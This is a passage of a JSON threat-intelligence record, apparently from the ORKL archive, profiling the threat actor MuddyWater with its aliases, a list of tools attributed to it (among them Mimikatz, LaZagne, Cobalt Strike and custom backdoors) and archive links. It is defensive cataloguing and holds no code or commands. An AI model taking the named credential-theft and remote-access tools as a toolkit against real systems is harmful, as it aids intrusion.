			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434234,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ed10a313a617e03120050d08eee67f2644a88608.pdf",
		"text": "https://archive.orkl.eu/ed10a313a617e03120050d08eee67f2644a88608.txt",
		"img": "https://archive.orkl.eu/ed10a313a617e03120050d08eee67f2644a88608.jpg"
	}
}